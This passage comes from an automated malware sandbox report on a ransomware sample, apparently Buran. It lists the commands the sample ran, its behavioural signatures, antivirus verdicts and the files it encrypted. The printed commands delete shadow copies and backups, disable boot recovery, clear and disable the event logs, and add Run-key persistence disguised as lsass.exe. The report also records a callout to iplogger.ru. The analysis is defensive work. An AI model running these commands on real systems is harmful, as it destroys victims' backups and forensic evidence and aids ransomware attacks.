630. "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
631.  
632.  
633. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
634.  
635.  
636. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
637.  
638.  
639. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
640.  
641.  
642. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
643.  
644.  
645. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
646.  
647.  
648. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
649.  
650.  
651. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
652.  
653.  
654. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
655.  
656.  
657. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
658.  
659.  
660. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
661.  
662.  
663. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
664.  
665.  
666. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
667.  
668.  
669. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
670.  
671.  
672. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
673.  
674.  
675. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
676.  
677.  
678. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
679.  
680.  
681. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
682.  
683.  
684. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
685.  
686.  
687. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
688.  
689.  
690. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
691.  
692.  
693. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
694.  
695.  
696. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
697.  
698.  
699. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
700.  
701.  
702. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
703.  
704.  
705. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
706.  
707.  
708. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
709.  
710.  
711. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
712.  
713.  
714. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
715.  
716.  
717. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
718.  
719.  
720. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
721.  
722.  
723. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
724.  
725.  
726. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
727.  
728.  
729. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
730.  
731.  
732. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
733.  
734.  
735. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
736.  
737.  
738. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
739.  
740.  
741. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
742.  
743.  
744. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
745.  
746.  
747. "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
748.  
749.  
750. "command": "sc config eventlog start=disabled"
751.  
752.  
753. "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
754.  
755.  
756.  
757.  
758. "Description": "Attempts to delete volume shadow copies",
759. "Details":
760.  
761.  
762. "Description": "Deletes its original binary from disk",
763. "Details":
764.  
765.  
766. "Description": "Modifies boot configuration settings",
767. "Details":
768.  
769. "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
770.  
771.  
772. "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
773.  
774.  
775.  
776.  
777. "Description": "A system process is generating network traffic likely as a result of process injection",
778. "Details":
779.  
780. "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
781.  
782.  
783. "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
784.  
785.  
786.  
787.  
788. "Description": "Installs itself for autorun at Windows startup",
789. "Details":
790.  
791. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
792.  
793.  
794. "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
795.  
796.  
797.  
798.  
799. "Description": "Exhibits possible ransomware file modification behavior",
800. "Details":
801.  
802. "file_modifications": "Performs 146 file moves indicative of a potential file encryption process"
803.  
804.  
805. "drops_unknown_mimetypes": "Drops 159 unknown file mime types which may be indicative of encrypted files being written back to disk"
806.  
807.  
808.  
809.  
810. "Description": "Writes a potential ransom message to disk",
811. "Details":
812.  
813. "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
814.  
815.  
816.  
817.  
818. "Description": "Stack pivoting was detected when using a critical API",
819. "Details":
820.  
821. "process": "taskeng.exe:2584"
822.  
823.  
824. "process": "taskeng.exe:1604"
825.  
826.  
827.  
828.  
829. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
830. "Details":
831.  
832. "Cylance": "Unsafe"
833.  
834.  
835. "CrowdStrike": "win/malicious_confidence_100% (D)"
836.  
837.  
838. "Symantec": "ML.Attribute.HighConfidence"
839.  
840.  
841. "APEX": "Malicious"
842.  
843.  
844. "Endgame": "malicious (high confidence)"
845.  
846.  
847. "Invincea": "heuristic"
848.  
849.  
850. "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
851.  
852.  
853. "FireEye": "Generic.mg.636d3c669e36510b"
854.  
855.  
856. "SentinelOne": "DFI - Malicious PE"
857.  
858.  
859. "Microsoft": "Trojan:Win32/Suloc.A"
860.  
861.  
862. "Acronis": "suspicious"
863.  
864.  
865. "VBA32": "Malware-Cryptor.General.3"
866.  
867.  
868. "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
869.  
870.  
871. "Cybereason": "malicious.5d1a74"
872.  
873.  
874. "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
875.  
876.  
877.  
878.  
879. "Description": "Detects VirtualBox through the presence of a file",
880. "Details":
881.  
882. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
883.  
884.  
885. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
886.  
887.  
888. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
889.  
890.  
891. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
892.  
893.  
894. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
895.  
896.  
897. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
898.  
899.  
900.  
901.  
902. "Description": "Clears Windows events or logs",
903. "Details":
904.  
905. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
906.  
907.  
908. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
909.  
910.  
911. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
912.  
913.  
914. "command": "wevtutil.exe clear-log Application"
915.  
916.  
917. "command": "wevtutil.exe clear-log Security"
918.  
919.  
920. "command": "wevtutil.exe clear-log System"
921.  
922.  
923.  
924.  
925. "Description": "Appears to use character obfuscation in a command line",
926. "Details":
927.  
928. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
929.  
930.  
931.  
932.  
933. "Description": "Creates a copy of itself",
934. "Details":
935.  
936. "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
937.  
938.  
939.  
940.  
941. "Description": "Drops a binary and executes it",
942. "Details":
943.  
944. "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
945.  
946.  
947.  
948.  
949. "Description": "Anomalous binary characteristics",
950. "Details":
951.  
952. "anomaly": "Found duplicated section names"
953.  
954.  
955.  
956.  
957. "Description": "Uses suspicious command line tools or Windows utilities",
958. "Details":
959.  
960. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
961.  
962.  
963. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
964.  
965.  
966. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
967.  
968.  
969. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
970.  
971.  
972. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
973.  
974.  
975. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
976.  
977.  
978. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
979.  
980.  
981. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
982.  
983.  
984. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
985.  
986.  
987. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
988.  
989.  
990. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
991.  
992.  
993. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
994.  
995.  
996. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
997.  
998.  
999. "command": "vssadmin delete shadows /all /quiet"
1000.  
1001.  
1002. "command": "wevtutil.exe clear-log Application"
1003.  
1004.  
1005. "command": "wevtutil.exe clear-log Security"
1006.  
1007.  
1008. "command": "wevtutil.exe clear-log System"
1009.  
1010.  
1011.  
1012.  
1013.  
1014. * Started Service:
1015.  
1016. * Mutexes:
1017. "Global\\ADAP_WMI_ENTRY",
1018. "Global\\RefreshRA_Mutex",
1019. "Global\\RefreshRA_Mutex_Lib",
1020. "Global\\RefreshRA_Mutex_Flag"
1021.  
1022.  
1023. * Modified Files:
1024. "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
1025. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
1026. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
1027. "\\??\\PIPE\\wkssvc",
1028. "\\Device\\LanmanDatagramReceiver",
1029. "\\??\\PIPE\\DAV RPC SERVICE",
1030. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
1031. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
1032. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
1033. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
1034. "\\??\\PIPE\\samr",
1035. "C:\\.doc",
1036. "C:\\.doc.875B149F-7E2C-F9D8-914C-24C48737255D",
1037. "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1038. "C:\\.htm",
1039. "C:\\.htm.875B149F-7E2C-F9D8-914C-24C48737255D",
1040. "C:\\.jpeg",
1041. "C:\\.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
1042. "C:\\.jpg",
1043. "C:\\.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
1044. "C:\\.pptx",
1045. "C:\\.pptx.875B149F-7E2C-F9D8-914C-24C48737255D",
1046. "C:\\.txt",
1047. "C:\\.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1048. "C:\\.xls",
1049. "C:\\.xls.875B149F-7E2C-F9D8-914C-24C48737255D",
1050. "C:\\.zip",
1051. "C:\\Host.bmp",
1052. "C:\\Host.bmp.875B149F-7E2C-F9D8-914C-24C48737255D",
1053. "C:\\Host.docx",
1054. "C:\\Host.docx.875B149F-7E2C-F9D8-914C-24C48737255D",
1055. "C:\\Host.html",
1056. "C:\\Host.html.875B149F-7E2C-F9D8-914C-24C48737255D",
1057. "C:\\Host.jpeg",
1058. "C:\\Host.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
1059. "C:\\Host.jpg",
1060. "C:\\Host.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
1061. "C:\\Host.pdf",
1062. "C:\\Host.pdf.875B149F-7E2C-F9D8-914C-24C48737255D",
1063. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
1064. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.875B149F-7E2C-F9D8-914C-24C48737255D",
1065. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1066. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
1067. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.875B149F-7E2C-F9D8-914C-24C48737255D",
1068. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
1069. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1070. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
1071. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1072. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
1073. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1074. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
1075. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1076. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
1077. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1078. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
1079. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1080. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
1081. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.875B149F-7E2C-F9D8-914C-24C48737255D",
1082. "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1083. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
1084. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D",
1085. "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
1086. "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1087. "C:\\Program Files\\Java\\jre1.8.0_201\\release",
1088. "C:\\Program Files\\Java\\jre1.8.0_201\\release.875B149F-7E2C-F9D8-914C-24C48737255D",
1089. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
1090. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1091. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
1092. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1093. "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
1094. "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html.875B149F-7E2C-F9D8-914C-24C48737255D",
1095. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
1096. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa.875B149F-7E2C-F9D8-914C-24C48737255D",
1097. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1098. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
1099. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1100. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
1101. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1102. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1103. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
1104. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1105. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
1106. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1107. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
1108. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist.875B149F-7E2C-F9D8-914C-24C48737255D",
1109. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
1110. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1111. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
1112. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data.875B149F-7E2C-F9D8-914C-24C48737255D",
1113. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
1114. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1115. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
1116. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1117. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
1118. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1119. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
1120. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src.875B149F-7E2C-F9D8-914C-24C48737255D",
1121. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
1122. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1123. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
1124. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1125. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
1126. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1127. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
1128. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1129. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
1130. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1131. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
1132. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1133. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
1134. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1135. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
1136. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1137. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
1138. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1139. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
1140. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1141. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
1142. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
1143. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
1144. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1145. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
1146. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1147. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
1148. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja.875B149F-7E2C-F9D8-914C-24C48737255D",
1149. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
1150. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1151. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
1152. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1153. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
1154. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1155. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
1156. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1157. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
1158. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat.875B149F-7E2C-F9D8-914C-24C48737255D",
1159. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
1160. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings.875B149F-7E2C-F9D8-914C-24C48737255D",
1161. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
1162. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg.875B149F-7E2C-F9D8-914C-24C48737255D",
1163. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1164. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
1165. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1166. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1167. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
1168. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1169. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
1170. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1171. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
1172. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1173. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
1174. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1175. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
1176. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip.875B149F-7E2C-F9D8-914C-24C48737255D",
1177. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1178. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
1179. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1180. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
1181. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1182. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
1183. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1184. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
1185. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1186. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
